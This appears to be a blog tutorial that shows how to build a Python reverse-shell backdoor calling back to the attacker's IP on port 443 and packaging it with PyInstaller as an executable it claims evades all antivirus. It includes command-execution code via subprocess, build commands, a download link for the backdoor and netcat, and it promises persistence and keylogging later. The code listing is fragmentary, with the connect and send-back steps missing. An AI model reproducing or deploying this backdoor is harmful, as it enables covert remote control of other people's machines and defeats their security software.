Today we are going to program a simple custom backdoor — a few lines of code — that totally avoids detection by every a/v out there. We’re gonna be writing this code in the Python programming language. If you don’t have the environment set up, never worry. I have another brief video/post showing you the requirements, click here to check it out.
The idea is to give you guys the power of creating your own backdoors instead of blatantly depending on crypters, third-party code (which isn’t always safe to use) and so on. In all honesty, I’m just as new to Python as most of you readers probably are — although if you check my about page, I do program in other languages — nevertheless I have faith that with a little effort we will be able to not only create a stealthier backdoor, but also add new features as well such as persistence, keylogging and maybe even a multi-threaded listener to control more than one client at a time.
Right now, this is mainly speculation and of course, the main aspect of this is not to have a shell to do bad things with it, but to learn how these protocols work in and out of Python — so yes, if you are interested in custom backdoors for another language, just drop a line.
Hopefully this tutorial will also become a series, so long as you guys — the readers — collaborate ideas to implement and help out as well to make a stealthier custom backdoor.
Here is the code used for the custom shell, just make sure to substitute anywhere with an underline for your own values, such as IP, port, etc.
HOST = 'Your IP Adress'
PORT = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
data = s.recv(1024)
if data == "quit": break
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdoutput = proc.stdout.read() + proc.stderr.read()
# loop ends here
You can click here and download my copy of the backdoor and netcat. [ DOWNLOAD ]
I have seen this code in a few places, such as Dave K’s blog and the book “Foundations of Python Network Programming” both listed at the end of this post in the further readings section…
As mentioned in my previous post we will be using PyInstaller to create the stand-alone executable. It comes out pretty heavy for a shell (a few megs) but hey, works mint and completely undetectable.
Here is the code used for compiling the code, again, just replace the underlined part. Oh yea, make sure you are inside the PyInstaller directory as well… and that you have your code copied to that location.
python Makespec.py --onefile shell.py
python Build.py shell\shell.spec
That’s about it, your executable should be ready to go — inside the /dist folder.
Check out the video for commentary explaining the code line by line…